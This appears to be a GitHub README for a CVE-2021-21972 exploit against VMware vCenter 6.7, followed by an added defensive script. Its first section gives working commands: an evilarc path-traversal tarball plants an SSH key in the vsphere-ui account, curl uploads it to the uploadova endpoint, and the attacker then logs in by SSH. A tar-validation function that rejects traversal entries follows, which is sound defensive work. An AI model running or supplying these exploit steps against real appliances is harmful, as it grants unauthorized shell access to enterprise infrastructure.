
renini/CVE-2021-21972


CVE-2021-21972


Tested against VMware VCSA 6.7

create ssh keypair

ssh-keygen -t rsa -f vcsa.key -N ''

create tarball with ../../../../../home/vsphere-ui/.ssh/authorized_keys

python2 evilarc.py -d 5 -p 'home/vsphere-ui/.ssh' -o unix -f evil.tar authorized_keys
mv evil.tar evil.ova

upload evil.ova to the vropspluginui uploadova REST endpoint

curl -k -A "" --form "uploadFile=@evil.ova;type=text/plain" https://$VCSA_IP/ui/vropspluginui/rest/services/uploadova -H "Accept: application/json"

ssh to vcsa with the added authorized key

ssh -i vcsa.key vsphere-ui@$VCSA_IP
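
The steps above work only because the archive entry name is joined to the extraction directory without validation. As an added example (not part of this repository), here is a check that an upload handler or triage script could run on an OVA/tar before unpacking. The function names and the /tmp/ova-unpack destination are assumptions.

```python
import io
import posixpath
import tarfile


def unsafe_members(archive_bytes, dest="/tmp/ova-unpack"):
    """Return (member name, reason) for entries that must not be unpacked into dest.

    dest is an assumed extraction directory; the check is purely lexical.
    """
    dest = posixpath.normpath(dest)
    findings = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:*") as tar:
        for member in tar.getmembers():
            name = member.name.replace("\\", "/")
            target = posixpath.normpath(posixpath.join(dest, name))
            if name.startswith("/"):
                findings.append((member.name, "absolute path"))
            elif target != dest and not target.startswith(dest + "/"):
                findings.append((member.name, "escapes destination via '..'"))
            elif member.issym() or member.islnk():
                findings.append((member.name, "link entry"))
            elif not (member.isfile() or member.isdir()):
                findings.append((member.name, "special file"))
    return findings


def build_sample(names):
    """Constructed input for the demo: an in-memory tar with the given entry names."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name in names:
            data = b"constructed sample\n"
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample([
        "appliance.ovf",
        "../../../../../home/vsphere-ui/.ssh/authorized_keys",  # entry name from the step above
    ])
    for name, reason in unsafe_members(sample):
        print(f"REJECT {name}: {reason}")
```

On Python 3.12 and later, tarfile's extraction filters (`extractall(..., filter="data")`) enforce the same rule at unpack time.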
